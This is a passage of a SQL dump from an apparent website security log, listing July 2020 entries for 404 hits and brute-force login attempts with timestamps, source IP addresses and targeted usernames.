01:15:44','66.249.65.157',NULL,NULL),(68661,'four_oh_four','2020-07-11 20:37:20','2020-07-12 01:37:20','66.249.65.157',NULL,NULL),(68662,'four_oh_four','2020-07-11 20:49:42','2020-07-12 01:49:42','66.249.65.158',NULL,NULL),(68663,'four_oh_four','2020-07-12 01:09:30','2020-07-12 06:09:30','194.61.24.94',NULL,NULL),(68664,'four_oh_four','2020-07-12 03:24:51','2020-07-12 08:24:51','198.54.126.74',NULL,NULL),(68665,'four_oh_four','2020-07-12 03:42:16','2020-07-12 08:42:16','35.210.155.244',NULL,NULL),(68666,'brute_force','2020-07-12 08:08:23','2020-07-12 13:08:23','182.50.130.82',NULL,NULL),(68667,'brute_force','2020-07-12 08:08:23','2020-07-12 13:08:23',NULL,NULL,'admin'),(68668,'four_oh_four','2020-07-12 09:33:22','2020-07-12 14:33:22','118.190.54.205',NULL,NULL),(68669,'four_oh_four','2020-07-12 09:33:22','2020-07-12 14:33:22','118.190.54.205',NULL,NULL),(68670,'four_oh_four','2020-07-12 09:33:22','2020-07-12 14:33:22','118.190.54.205',NULL,NULL),(68671,'four_oh_four','2020-07-12 09:33:22','2020-07-12 14:33:22','118.190.54.205',NULL,NULL),(68672,'four_oh_four','2020-07-12 09:33:22','2020-07-12 14:33:22','118.190.54.205',NULL,NULL),(68673,'four_oh_four','2020-07-12 09:33:23','2020-07-12 14:33:23','118.190.54.205',NULL,NULL),(68674,'four_oh_four','2020-07-12 09:33:23','2020-07-12 14:33:23','118.190.54.205',NULL,NULL),(68675,'four_oh_four','2020-07-12 09:33:23','2020-07-12 14:33:23','118.190.54.205',NULL,NULL),(68676,'four_oh_four','2020-07-12 09:33:24','2020-07-12 14:33:24','118.190.54.205',NULL,NULL),(68677,'four_oh_four','2020-07-12 12:12:56','2020-07-12 17:12:56','66.249.65.156',NULL,NULL),(68678,'four_oh_four','2020-07-12 12:37:31','2020-07-12 17:37:31','149.202.193.120',NULL,NULL),(68679,'four_oh_four','2020-07-12 12:37:31','2020-07-12 17:37:31','149.202.193.120',NULL,NULL),(68680,'four_oh_four','2020-07-12 12:37:31','2020-07-12 17:37:31','149.202.193.120',NULL,NULL),(68681,'four_oh_four','2020-07-12 12:37:31','2020-07-12 17:37:31','149.202.193.120',NULL,NULL),(68682,'four_oh_four','2020-07-12 12:50:16','2020-07-12 17:50:16','35.210.166.102',NULL,NULL),(68683,'four_oh_four','2020-07-12 13:37:47','2020-07-12 18:37:47','66.249.65.156',NULL,NULL),(68684,'four_oh_four','2020-07-12 13:51:59','2020-07-12 18:51:59','66.249.65.157',NULL,NULL),(68685,'four_oh_four','2020-07-12 13:58:20','2020-07-12 18:58:20','66.249.65.156',NULL,NULL),(68686,'four_oh_four','2020-07-12 14:08:06','2020-07-12 19:08:06','184.154.139.3',NULL,NULL),(68687,'four_oh_four','2020-07-12 14:50:19','2020-07-12 19:50:19','52.201.182.91',NULL,NULL),(68688,'four_oh_four','2020-07-12 14:50:21','2020-07-12 19:50:21','52.201.182.91',NULL,NULL),(68689,'four_oh_four','2020-07-12 14:50:25','2020-07-12 19:50:25','52.201.182.91',NULL,NULL),(68690,'four_oh_four','2020-07-12 14:50:26','2020-07-12 19:50:26','52.201.182.91',NULL,NULL),(68691,'four_oh_four','2020-07-12 21:55:43','2020-07-13 02:55:43','194.61.24.94',NULL,NULL),(68692,'four_oh_four','2020-07-12 22:30:09','2020-07-13 03:30:09','35.210.144.200',NULL,NULL),(68693,'four_oh_four','2020-07-13 03:58:25','2020-07-13 08:58:25','66.249.65.140',NULL,NULL),(68694,'four_oh_four','2020-07-13 06:40:09','2020-07-13 11:40:09','66.249.65.157',NULL,NULL),(68695,'four_oh_four','2020-07-13 06:49:12','2020-07-13 11:49:12','66.249.65.158',NULL,NULL),(68696,'four_oh_four','2020-07-13 07:02:44','2020-07-13 12:02:44','66.249.65.158',NULL,NULL),(68697,'four_oh_four','2020-07-13 07:04:03','2020-07-13 12:04:03','66.249.65.157',NULL,NULL),(68698,'four_oh_four','2020-07-13 07:11:04','2020-07-13 12:11:04','66.249.65.158',NULL,NULL),(68699,'four_oh_four','2020-07-13 07:11:13','2020-07-13 12:11:13','66.249.65.156',NULL,NULL),(68700,'four_oh_four','2020-07-13 12:22:15','2020-07-13 17:22:15','51.158.153.223',NULL,NULL),(68701,'four_oh_four','2020-07-13 14:05:04','2020-07-13 19:05:04','184.154.139.3',NULL,NULL),(68702,'four_oh_four','2020-07-13 14:57:20','2020-07-13 19:57:20','3.94.137.21',NULL,NULL),(68703,'four_oh_four','2020-07-13 14:57:22','2020-07-13 19:57:22','3.94.137.21',NULL,NULL),(68704,'four_oh_four','2020-07-13 14:59:54','2020-07-13 19:59:54','40.77.167.73',NULL,NULL),(68705,'four_oh_four','2020-07-13 18:28:48','2020-07-13 23:28:48','5.188.84.76',NULL,NULL),(68706,'four_oh_four','2020-07-13 18:40:40','2020-07-13 23:40:40','194.61.24.94',NULL,NULL),(68707,'brute_force','2020-07-13 18:49:26','2020-07-13 23:49:26','115.186.183.189',NULL,NULL),(68708,'brute_force','2020-07-13 18:49:26','2020-07-13 23:49:26',NULL,NULL,'admin'),(68709,'four_oh_four','2020-07-13 19:16:21','2020-07-14 00:16:21','66.249.65.157',NULL,NULL),(68710,'four_oh_four','2020-07-13 19:33:09','2020-07-14 00:33:09','66.249.65.158',NULL,NULL),(68711,'four_oh_four','2020-07-13 20:15:59','2020-07-14 01:15:59','66.249.65.158',NULL,NULL),(68712,'brute_force','2020-07-13 22:51:24','2020-07-14 03:51:24','141.138.45.14',NULL,NULL),(68713,'brute_force','2020-07-13 22:51:24','2020-07-14 03:51:24',NULL,NULL,'zphiblgz'),(68714,'brute_force','2020-07-13 22:52:25','2020-07-14 03:52:25','141.138.45.14',NULL,NULL),(68715,'brute_force','2020-07-13 22:52:25','2020-07-14 03:52:25',NULL,NULL,'zphiblgz'),(68716,'brute_force','2020-07-13 22:53:27','2020-07-14 03:53:27','141.138.45.14',NULL,NULL),(68717,'brute_force','2020-07-13 22:53:27','2020-07-14 03:53:27',NULL,NULL,'zphiblgz'),(68718,'brute_force','2020-07-13 22:54:27','2020-07-14 03:54:27','141.138.45.14',NULL,NULL),(68719,'brute_force','2020-07-13 22:54:27','2020-07-14 03:54:27',NULL,NULL,'zphiblgz'),(68720,'brute_force','2020-07-13 22:55:30','2020-07-14 03:55:30','141.138.45.14',NULL,NULL),(68721,'brute_force','2020-07-13 22:55:30','2020-07-14 03:55:30',NULL,NULL,'zphiblgz'),(68722,'four_oh_four','2020-07-13 22:56:15','2020-07-14 03:56:15','40.77.167.73',NULL,NULL),(68723,'brute_force','2020-07-13 23:10:42','2020-07-14 04:10:42','141.138.45.14',NULL,NULL),(68724,'brute_force','2020-07-13 23:10:42','2020-07-14 04:10:42',NULL,NULL,'zphiblgz'),(68725,'brute_force','2020-07-13 23:25:57','2020-07-14 04:25:57','141.138.45.14',NULL,NULL),(68726,'brute_force','2020-07-13 23:25:57','2020-07-14 04:25:57',NULL,NULL,'zphiblgz'),(68727,'brute_force','2020-07-13 23:26:59','2020-07-14 04:26:59','141.138.45.14',NULL,NULL),(68728,'brute_force','2020-07-13 23:26:59','2020-07-14 04:26:59',NULL,NULL,'zphiblgz'),(68729,'brute_force','2020-07-13 23:27:59','2020-07-14 04:27:59','141.138.45.14',NULL,NULL),(68730,'brute_force','2020-07-13 23:27:59','2020-07-14 04:27:59',NULL,NULL,'zphiblgz'),(68731,'brute_force','2020-07-13 23:29:00','2020-07-14 04:29:00','141.138.45.14',NULL,NULL),(68732,'brute_force','2020-07-13 23:29:00','2020-07-14 04:29:00',NULL,NULL,'zphiblgz'),(68733,'brute_force','2020-07-13 23:30:02','2020-07-14 04:30:02','141.138.45.14',NULL,NULL),(68734,'brute_force','2020-07-13 23:30:02','2020-07-14 04:30:02',NULL,NULL,'zphiblgz'),(68735,'four_oh_four','2020-07-14 04:00:49','2020-07-14 09:00:49','17.58.102.51',NULL,NULL),(68736,'four_oh_four','2020-07-14 06:32:58','2020-07-14 11:32:58','66.249.65.158',NULL,NULL),(68737,'four_oh_four','2020-07-14 06:38:26','2020-07-14 11:38:26','66.249.65.157',NULL,NULL),(68738,'four_oh_four','2020-07-14 06:45:58','2020-07-14 11:45:58','66.249.65.156',NULL,NULL),(68739,'four_oh_four','2020-07-14 06:50:02','2020-07-14 11:50:02','66.249.65.158',NULL,NULL),(68740,'four_oh_four','2020-07-14 07:02:44','2020-07-14 12:02:44','66.249.65.158',NULL,NULL),(68741,'four_oh_four','2020-07-14 10:03:24','2020-07-14 15:03:24','66.249.65.156',NULL,NULL),(68742,'four_oh_four','2020-07-14 14:10:39','2020-07-14 19:10:39','184.154.139.18',NULL,NULL),(68743,'four_oh_four','2020-07-14 15:02:11','2020-07-14 20:02:11','3.94.137.21',NULL,NULL),(68744,'four_oh_four','2020-07-14 15:02:14','2020-07-14 20:02:14','3.94.137.21',NULL,NULL),(68745,'four_oh_four','2020-07-14 15:02:15','2020-07-14 20:02:15','3.94.137.21',NULL,NULL),(68746,'four_oh_four','2020-07-14 15:02:16','2020-07-14 20:02:16','3.94.137.21',NULL,NULL),(68747,'four_oh_four','2020-07-14 15:31:50','2020-07-14 20:31:50','194.61.24.94',NULL,NULL),(68748,'four_oh_four','2020-07-14 16:25:05','2020-07-14 21:25:05','50.87.192.198',NULL,NULL),(68749,'four_oh_four','2020-07-14 16:45:44','2020-07-14 21:45:44','116.179.32.26',NULL,NULL),(68750,'four_oh_four','2020-07-14 16:52:27','2020-07-14 21:52:27','66.249.65.158',NULL,NULL),(68751,'four_oh_four','2020-07-14 16:58:36','2020-07-14 21:58:36','66.249.65.158',NULL,NULL),(68752,'four_oh_four','2020-07-14 17:12:37','2020-07-14 22:12:37','66.249.65.158',NULL,NULL),(68753,'four_oh_four','2020-07-14 17:15:13','2020-07-14 22:15:13','66.249.65.156',NULL,NULL),(68754,'four_oh_four','2020-07-14 17:16:30','2020-07-14 22:16:30','66.249.65.158',NULL,NULL),(68755,'four_oh_four','2020-07-14 17:22:40','2020-07-14 22:22:40','66.249.65.156',NULL,NULL),(68756,'four_oh_four','2020-07-14 17:26:15','2020-07-14 22:26:15','66.249.65.158',NULL,NULL),(68757,'four_oh_four','2020-07-15 01:02:07','2020-07-15 06:02:07','23.95.119.145',NULL,NULL),(68758,'four_oh_four','2020-07-15 02:18:57','2020-07-15 07:18:57','103.139.113.34',NULL,NULL),(68759,'four_oh_four','2020-07-15 02:25:44','2020-07-15 07:25:44','66.249.65.158',NULL,NULL),(68760,'four_oh_four','2020-07-15 02:32:28','2020-07-15 07:32:28','66.249.65.157',NULL,NULL),(68761,'four_oh_four','2020-07-15 02:32:30','2020-07-15 07:32:30','66.249.65.158',NULL,NULL),(68762,'brute_force','2020-07-15 02:36:56','2020-07-15 07:36:56','141.138.41.205',NULL,NULL),(68763,'brute_force','2020-07-15 02:36:56','2020-07-15 07:36:56',NULL,NULL,'admin'),(68764,'four_oh_four','2020-07-15 02:37:41','2020-07-15 07:37:41','66.249.65.156',NULL,NULL),(68765,'brute_force','2020-07-15 02:37:56','2020-07-15 07:37:56','141.138.41.205',NULL,NULL),(68766,'brute_force','2020-07-15 02:37:56','2020-07-15 07:37:56',NULL,NULL,'admin'),(68767,'brute_force','2020-07-15 02:39:02','2020-07-15 07:39:02','141.138.41.205',NULL,NULL),(68768,'brute_force','2020-07-15 02:39:02','2020-07-15 07:39:02',NULL,NULL,'admin'),(68769,'brute_force','2020-07-15 02:40:04','2020-07-15 07:40:04','141.138.41.205',NULL,NULL),(68770,'brute_force','2020-07-15 02:40:04','2020-07-15 07:40:04',NULL,NULL,'admin'),(68771,'four_oh_four','2020-07-15 02:40:22','2020-07-15 07:40:22','66.249.65.156',NULL,NULL),(68772,'brute_force','2020-07-15 02:41:04','2020-07-15 07:41:04','141.138.41.205',NULL,NULL),(68773,'brute_force','2020-07-15 02:41:04','2020-07-15 07:41:04',NULL,NULL,'admin'),(68774,'four_oh_four','2020-07-15 02:44:47','2020-07-15 07:44:47','66.249.65.158',NULL,NULL),(68775,'four_oh_four','2020-07-15 02:51:00','2020-07-15 07:51:00','66.249.65.156',NULL,NULL),(68776,'brute_force','2020-07-15 02:56:19','2020-07-15 07:56:19','141.138.41.205',NULL,NULL),(68777,'brute_force','2020-07-15 02:56:19','2020-07-15 07:56:19',NULL,NULL,'admin'),(68778,'four_oh_four','2020-07-15 02:57:56','2020-07-15 07:57:56','66.249.65.157',NULL,NULL),(68779,'four_oh_four','2020-07-15 02:58:45','2020-07-15 07:58:45','66.249.65.156',NULL,NULL),(68780,'four_oh_four','2020-07-15 03:06:06','2020-07-15 08:06:06','66.249.65.157',NULL,NULL),(68781,'four_oh_four','2020-07-15 05:40:30','2020-07-15 10:40:30','94.23.43.140',NULL,NULL),(68782,'brute_force','2020-07-15 05:53:31','2020-07-15 10:53:31','182.50.130.114',NULL,NULL),(68783,'brute_force','2020-07-15 05:53:31','2020-07-15 10:53:31',NULL,NULL,'admin'),(68784,'four_oh_four','2020-07-15 12:23:57','2020-07-15 17:23:57','194.61.24.94',NULL,NULL),(68785,'four_oh_four','2020-07-15 14:02:26','2020-07-15 19:02:26','184.154.139.20',NULL,NULL),(68786,'four_oh_four','2020-07-15 14:10:43','2020-07-15 19:10:43','66.249.65.156',NULL,NULL),(68787,'four_oh_four','2020-07-15 14:25:23','2020-07-15 19:25:23','66.249.65.158',NULL,NULL),(68788,'four_oh_four','2020-07-15 14:25:51','2020-07-15 19:25:51','66.249.65.156',NULL,NULL),(68789,'four_oh_four','2020-07-15 15:05:20','2020-07-15 20:05:20','52.201.182.91',NULL,NULL),(68790,'four_oh_four','2020-07-15 15:05:25','2020-07-15 20:05:25','52.201.182.91',NULL,NULL),(68791,'four_oh_four','2020-07-15 15:05:28','2020-07-15 20:05:28','52.201.182.91',NULL,NULL),(68792,'four_oh_four','2020-07-15 15:05:29','2020-07-15 20:05:29','52.201.182.91',NULL,NULL),(68793,'four_oh_four','2020-07-15 18:25:10','2020-07-15 23:25:10','73.172.190.142',NULL,NULL),(68794,'four_oh_four','2020-07-15 23:06:59','2020-07-16 04:06:59','207.46.13.160',NULL,NULL),(68795,'brute_force','2020-07-16 01:10:10','2020-07-16 06:10:10','141.138.43.134',NULL,NULL),(68796,'brute_force','2020-07-16 01:10:10','2020-07-16 06:10:10',NULL,NULL,'admin'),(68797,'brute_force','2020-07-16 01:11:12','2020-07-16 06:11:12','141.138.43.134',NULL,NULL),(68798,'brute_force','2020-07-16 01:11:12','2020-07-16 06:11:12',NULL,NULL,'admin'),(68799,'brute_force','2020-07-16 01:12:14','2020-07-16 06:12:14','141.138.43.134',NULL,NULL),(68800,'brute_force','2020-07-16 01:12:14','2020-07-16 06:12:14',NULL,NULL,'admin'),(68801,'brute_force','2020-07-16 01:13:13','2020-07-16 06:13:13','141.138.43.134',NULL,NULL),(68802,'brute_force','2020-07-16 01:13:13','2020-07-16 06:13:13',NULL,NULL,'admin'),(68803,'brute_force','2020-07-16 01:14:14','2020-07-16 06:14:14','141.138.43.134',NULL,NULL),(68804,'brute_force','2020-07-16 01:14:14','2020-07-16 06:14:14',NULL,NULL,'admin'),(68805,'brute_force','2020-07-16 01:29:29','2020-07-16 06:29:29','141.138.43.134',NULL,NULL),(68806,'brute_force','2020-07-16 01:29:29','2020-07-16 06:29:29',NULL,NULL,'admin'),(68807,'brute_force','2020-07-16 01:44:44','2020-07-16 06:44:44','141.138.43.134',NULL,NULL),(68808,'brute_force','2020-07-16 01:44:44','2020-07-16 06:44:44',NULL,NULL,'admin'),(68809,'brute_force','2020-07-16 01:45:45','2020-07-16 06:45:45','141.138.43.134',NULL,NULL),(68810,'brute_force','2020-07-16 01:45:45','2020-07-16 06:45:45',NULL,NULL,'admin'),(68811,'brute_force','2020-07-16 01:46:46','2020-07-16 06:46:46','141.138.43.134',NULL,NULL),(68812,'brute_force','2020-07-16 01:46:46','2020-07-16 06:46:46',NULL,NULL,'admin'),(68813,'brute_force','2020-07-16 01:47:47','2020-07-16 06:47:47','141.138.43.134',NULL,NULL),(68814,'brute_force','2020-07-16 01:47:47','2020-07-16 06:47:47',NULL,NULL,'admin'),(68815,'brute_force','2020-07-16 01:48:48','2020-07-16 06:48:48','141.138.43.134',NULL,NULL),(68816,'brute_force','2020-07-16 01:48:48','2020-07-16 06:48:48',NULL,NULL,'admin'),(68817,'brute_force','2020-07-16 02:04:03','2020-07-16 07:04:03','141.138.43.134',NULL,NULL),(68818,'brute_force','2020-07-16 02:04:03','2020-07-16 07:04:03',NULL,NULL,'admin'),(68819,'four_oh_four','2020-07-16 05:17:20','2020-07-16 10:17:20','162.243.29.24',NULL,NULL),(68820,'four_oh_four','2020-07-16 09:07:05','2020-07-16 14:07:05','194.61.24.94',NULL,NULL),(68821,'four_oh_four','2020-07-16 09:48:12','2020-07-16 14:48:12','207.46.13.135',NULL,NULL),(68822,'four_oh_four','2020-07-16 13:10:17','2020-07-16 18:10:17','162.243.29.24',NULL,NULL),(68823,'four_oh_four','2020-07-16 14:03:12','2020-07-16 19:03:12','184.154.139.19',NULL,NULL),(68824,'four_oh_four','2020-07-16 15:12:37','2020-07-16 20:12:37','52.201.182.91',NULL,NULL),(68825,'four_oh_four','2020-07-16 15:12:37','2020-07-16 20:12:37','3.94.137.21',NULL,NULL),(68826,'four_oh_four','2020-07-16 15:12:40','2020-07-16 20:12:40','3.94.137.21',NULL,NULL),(68827,'four_oh_four','2020-07-16 15:12:41','2020-07-16 20:12:41','52.201.182.91',NULL,NULL),(68828,'four_oh_four','2020-07-16 16:03:46','2020-07-16 21:03:46','5.188.84.76',NULL,NULL),(68829,'brute_force','2020-07-16 16:15:02','2020-07-16 21:15:02','62.149.143.94',NULL,NULL),(68830,'brute_force','2020-07-16 16:15:02','2020-07-16 21:15:02',NULL,NULL,'admin'),(68831,'four_oh_four','2020-07-16 23:42:38','2020-07-17 04:42:38','178.128.151.69',NULL,NULL),(68832,'four_oh_four','2020-07-16 23:48:09','2020-07-17 04:48:09','178.128.151.69',NULL,NULL),(68833,'four_oh_four','2020-07-16 23:57:03','2020-07-17 04:57:03','104.131.107.89',NULL,NULL),(68834,'four_oh_four','2020-07-17 04:26:52','2020-07-17 09:26:52','66.249.65.157',NULL,NULL),(68835,'four_oh_four','2020-07-17 05:48:05','2020-07-17 10:48:05','194.61.24.94',NULL,NULL),(68836,'four_oh_four','2020-07-17 06:24:36','2020-07-17 11:24:36','142.44.252.26',NULL,NULL),(68837,'four_oh_four','2020-07-17 06:24:52','2020-07-17 11:24:52','142.44.252.26',NULL,NULL),(68838,'four_oh_four','2020-07-17 06:55:30','2020-07-17 11:55:30','78.46.90.120',NULL,NULL),(68839,'four_oh_four','2020-07-17 06:55:58','2020-07-17 11:55:58','78.46.94.83',NULL,NULL),(68840,'four_oh_four','2020-07-17 08:27:32','2020-07-17 13:27:32','157.55.39.110',NULL,NULL),(68841,'four_oh_four','2020-07-17 10:03:55','2020-07-17 15:03:55','157.55.39.194',NULL,NULL),(68842,'four_oh_four','2020-07-17 10:26:13','2020-07-17 15:26:13','157.55.39.246',NULL,NULL),(68843,'four_oh_four','2020-07-17 14:11:32','2020-07-17 19:11:32','184.154.139.3',NULL,NULL),(68844,'four_oh_four','2020-07-17 15:17:42','2020-07-17 20:17:42','52.201.182.91',NULL,NULL),(68845,'four_oh_four','2020-07-17 15:17:45','2020-07-17 20:17:45','52.201.182.91',NULL,NULL),(68846,'four_oh_four','2020-07-17 15:17:50','2020-07-17 20:17:50','52.201.182.91',NULL,NULL),(68847,'four_oh_four','2020-07-17 15:17:51','2020-07-17 20:17:51','52.201.182.91',NULL,NULL),(68848,'four_oh_four','2020-07-17 16:40:23','2020-07-17 21:40:23','82.117.194.229',NULL,NULL),(68849,'four_oh_four','2020-07-17 23:55:43','2020-07-18 04:55:43','116.179.32.87',NULL,NULL),(68850,'four_oh_four','2020-07-18 02:13:08','2020-07-18 07:13:08','207.46.13.222',NULL,NULL),(68851,'brute_force','2020-07-18 02:16:29','2020-07-18 07:16:29','154.160.14.204',NULL,NULL),(68852,'brute_force','2020-07-18 02:16:29','2020-07-18 07:16:29',NULL,NULL,'zphiblgz'),(68853,'brute_force','2020-07-18 02:16:46','2020-07-18 07:16:46','39.32.0.170',NULL,NULL),(68854,'brute_force','2020-07-18 02:16:46','2020-07-18 07:16:46',NULL,NULL,'zphiblgz'),(68855,'brute_force','2020-07-18 02:17:49','2020-07-18 07:17:49','39.32.0.170',NULL,NULL),(68856,'brute_force','2020-07-18 02:17:49','2020-07-18 07:17:49',NULL,NULL,'zphiblgz'),(68857,'brute_force','2020-07-18 02:18:12','2020-07-18 07:18:12','106.215.218.66',NULL,NULL),(68858,'brute_force','2020-07-18 02:18:12','2020-07-18 07:18:12',NULL,NULL,'zphiblgz'),(68859,'brute_force','2020-07-18 02:18:50','2020-07-18 07:18:50','39.32.0.170',NULL,NULL),(68860,'brute_force','2020-07-18 02:18:50','2020-07-18 07:18:50',NULL,NULL,'zphiblgz'),(68861,'brute_force','2020-07-18 02:19:13','2020-07-18 07:19:13','106.215.218.66',NULL,NULL),(68862,'brute_force','2020-07-18 02:19:13','2020-07-18 07:19:13',NULL,NULL,'zphiblgz'),(68863,'brute_force','2020-07-18 02:19:51','2020-07-18 07:19:51','39.32.0.170',NULL,NULL),(68864,'brute_force','2020-07-18 02:19:51','2020-07-18 07:19:51',NULL,NULL,'zphiblgz'),(68865,'brute_force','2020-07-18 02:20:52','2020-07-18 07:20:52','39.32.0.170',NULL,NULL),(68866,'brute_force','2020-07-18 02:20:52','2020-07-18 07:20:52',NULL,NULL,'zphiblgz'),(68867,'brute_force','2020-07-18 02:22:20','2020-07-18 07:22:20','106.215.218.66',NULL,NULL),(68868,'brute_force','2020-07-18 02:22:20','2020-07-18 07:22:20',NULL,NULL,'zphiblgz'),(68869,'brute_force','2020-07-18 02:25:25','2020-07-18 07:25:25','106.215.218.66',NULL,NULL),(68870,'brute_force','2020-07-18 02:25:25','2020-07-18 07:25:25',NULL,NULL,'zphiblgz'),(68871,'brute_force','2020-07-18 02:26:27','2020-07-18 07:26:27','106.215.218.66',NULL,NULL),(68872,'brute_force','2020-07-18 02:26:27','2020-07-18 07:26:27',NULL,NULL,'zphiblgz'),(68873,'brute_force','2020-07-18 02:42:34','2020-07-18 07:42:34','50.62.176.72',NULL,NULL),(68874,'brute_force','2020-07-18 02:42:34','2020-07-18 07:42:34',NULL,NULL,'admin'),(68875,'four_oh_four','2020-07-18 02:44:27','2020-07-18 07:44:27','194.61.24.94',NULL,NULL),(68876,'brute_force','2020-07-18 02:50:56','2020-07-18 07:50:56','154.160.14.204',NULL,NULL),(68877,'brute_force','2020-07-18 02:50:56','2020-07-18 07:50:56',NULL,NULL,'zphiblgz'),(68878,'brute_force','2020-07-18 02:52:16','2020-07-18 07:52:16','154.160.14.204',NULL,NULL),(68879,'brute_force','2020-07-18 02:52:16','2020-07-18 07:52:16',NULL,NULL,'zphiblgz'),(68880,'brute_force','2020-07-18 02:53:27','2020-07-18 07:53:27','154.160.14.204',NULL,NULL),(68881,'brute_force','2020-07-18 02:53:27','2020-07-18 07:53:27',NULL,NULL,'zphiblgz'),(68882,'brute_force','2020-07-18 02:54:26','2020-07-18 07:54:26','154.160.14.204',NULL,NULL),(68883,'brute_force','2020-07-18 02:54:26','2020-07-18 07:54:26',NULL,NULL,'zphiblgz'),(68884,'brute_force','2020-07-18 02:55:27','2020-07-18 07:55:27','154.160.14.204',NULL,NULL),(68885,'brute_force','2020-07-18 02:55:27','2020-07-18 07:55:27',NULL,NULL,'zphiblgz'),(68886,'brute_force','2020-07-18 03:15:50','2020-07-18 08:15:50','106.215.218.66',NULL,NULL),(68887,'brute_force','2020-07-18 03:15:50','2020-07-18 08:15:50',NULL,NULL,'zphiblgz'),(68888,'brute_force','2020-07-18 03:16:52','2020-07-18 08:16:52','106.215.218.66',NULL,NULL),(68889,'brute_force','2020-07-18 03:16:52','2020-07-18 08:16:52',NULL,NULL,'zphiblgz'),(68890,'brute_force','2020-07-18 03:17:56','2020-07-18 08:17:56','106.215.218.66',NULL,NULL),(68891,'brute_force','2020-07-18 03:17:56','2020-07-18 08:17:56',NULL,NULL,'zphiblgz'),(68892,'brute_force','2020-07-18 03:18:56','2020-07-18 08:18:56','106.215.218.66',NULL,NULL),(68893,'brute_force','2020-07-18 03:18:56','2020-07-18 08:18:56',NULL,NULL,'zphiblgz'),(68894,'brute_force','2020-07-18 03:19:56','2020-07-18 08:19:56','106.215.218.66',NULL,NULL),(68895,'brute_force','2020-07-18 03:19:56','2020-07-18 08:19:56',NULL,NULL,'zphiblgz'),(68896,'brute_force','2020-07-18 03:36:27','2020-07-18 08:36:27','106.215.218.66',NULL,NULL),(68897,'brute_force','2020-07-18 03:36:27','2020-07-18 08:36:27',NULL,NULL,'zphiblgz'),(68898,'brute_force','2020-07-18 03:37:27','2020-07-18 08:37:27','106.215.218.66',NULL,NULL),(68899,'brute_force','2020-07-18 03:37:27','2020-07-18 08:37:27',NULL,NULL,'zphiblgz'),(68900,'brute_force','2020-07-18 03:38:29','2020-07-18 08:38:29','106.215.218.66',NULL,NULL),(68901,'brute_force','2020-07-18 03:38:29','2020-07-18 08:38:29',NULL,NULL,'zphiblgz'),(68902,'brute_force','2020-07-18 03:39:35','2020-07-18 08:39:35','106.215.218.66',NULL,NULL),(68903,'brute_force','2020-07-18 03:39:35','2020-07-18 08:39:35',NULL,NULL,'zphiblgz'),(68904,'brute_force','2020-07-18 03:52:44','2020-07-18 08:52:44','106.215.218.66',NULL,NULL),(68905,'brute_force','2020-07-18 03:52:44','2020-07-18 08:52:44',NULL,NULL,'zphiblgz'),(68906,'four_oh_four','2020-07-18 04:19:52','2020-07-18 09:19:52','40.77.167.157',NULL,NULL),(68907,'four_oh_four','2020-07-18 14:10:31','2020-07-18 19:10:31','184.154.139.17',NULL,NULL),(68908,'four_oh_four','2020-07-18 15:22:31','2020-07-18 20:22:31','52.201.182.91',NULL,NULL),(68909,'four_oh_four','2020-07-18 15:22:34','2020-07-18 20:22:34','52.201.182.91',NULL,NULL),(68910,'four_oh_four','2020-07-18 15:22:41','2020-07-18 20:22:41','3.94.137.21',NULL,NULL),(68911,'four_oh_four','2020-07-18 15:22:42','2020-07-18 20:22:42','3.94.137.21',NULL,NULL),(68912,'four_oh_four','2020-07-18 17:29:14','2020-07-18 22:29:14','193.106.30.99',NULL,NULL),(68913,'four_oh_four','2020-07-19 00:35:41','2020-07-19 05:35:41','40.77.167.90',NULL,NULL),(68914,'brute_force','2020-07-19 03:59:54','2020-07-19 08:59:54','154.160.14.204',NULL,NULL),(68915,'brute_force','2020-07-19 03:59:54','2020-07-19 08:59:54',NULL,NULL,'admin'),(68916,'brute_force','2020-07-19 04:00:55','2020-07-19 09:00:55','154.160.14.204',NULL,NULL),(68917,'brute_force','2020-07-19 04:00:55','2020-07-19 09:00:55',NULL,NULL,'admin'),(68918,'brute_force','2020-07-19 04:01:58','2020-07-19 09:01:58','154.160.14.204',NULL,NULL),(68919,'brute_force','2020-07-19 04:01:58','2020-07-19 09:01:58',NULL,NULL,'admin'),(68920,'brute_force','2020-07-19 04:03:00','2020-07-19 09:03:00','154.160.14.204',NULL,NULL),(68921,'brute_force','2020-07-19 04:03:00','2020-07-19 09:03:00',NULL,NULL,'admin'),(68922,'brute_force','2020-07-19 04:03:38','2020-07-19 09:03:38','154.160.14.204',NULL,NULL),(68923,'brute_force','2020-07-19 04:03:38','2020-07-19 09:03:38',NULL,NULL,'admin'),(68924,'four_oh_four','2020-07-19 06:13:15','2020-07-19 11:13:15','17.58.102.51',NULL,NULL),(68925,'four_oh_four','2020-07-19 06:24:12','2020-07-19 11:24:12','207.46.13.44',NULL,NULL),(68926,'four_oh_four','2020-07-19 14:02:02','2020-07-19 19:02:02','184.154.139.21',NULL,NULL),(68927,'four_oh_four','2020-07-19 14:04:43','2020-07-19 19:04:43','23.95.107.114',NULL,NULL),(68928,'brute_force','2020-07-19 14:11:25','2020-07-19 19:11:25','195.242.92.20',NULL,NULL),(68929,'brute_force','2020-07-19 14:11:25','2020-07-19 19:11:25',NULL,NULL,'admin'),(68930,'four_oh_four','2020-07-19 15:25:40','2020-07-19 20:25:40','52.201.182.91',NULL,NULL),(68931,'four_oh_four','2020-07-19 15:25:41','2020-07-19 20:25:41','3.94.137.21',NULL,NULL),(68932,'four_oh_four','2020-07-19 15:25:42','2020-07-19 20:25:42','3.94.137.21',NULL,NULL),(68933,'four_oh_four','2020-07-19 15:25:43','2020-07-19 20:25:43','52.201.182.91',NULL,NULL),(68934,'four_oh_four','2020-07-19 19:18:17','2020-07-20 00:18:17','139.59.42.214',NULL,NULL),(68935,'four_oh_four','2020-07-19 19:18:18','2020-07-20 00:18:18','139.59.42.214',NULL,NULL),(68936,'four_oh_four','2020-07-19 19:18:23','2020-07-20 00:18:23','139.59.42.214',NULL,NULL),(68937,'four_oh_four','2020-07-19 19:18:24','2020-07-20 00:18:24','139.59.42.214',NULL,NULL),(68938,'four_oh_four','2020-07-19 19:18:24','2020-07-20 00:18:24','139.59.42.214',NULL,NULL),(68939,'four_oh_four','2020-07-19 19:18:25','2020-07-20 00:18:25','139.59.42.214',NULL,NULL),(68940,'four_oh_four','2020-07-19 22:06:10','2020-07-20 03:06:10','40.77.167.169',NULL,NULL),(68941,'four_oh_four','2020-07-20 00:01:42','2020-07-20 05:01:42','157.55.39.9',NULL,NULL),(68942,'four_oh_four','2020-07-20 00:49:43','2020-07-20 05:49:43','78.46.94.83',NULL,NULL),(68943,'brute_force','2020-07-20 01:59:58','2020-07-20 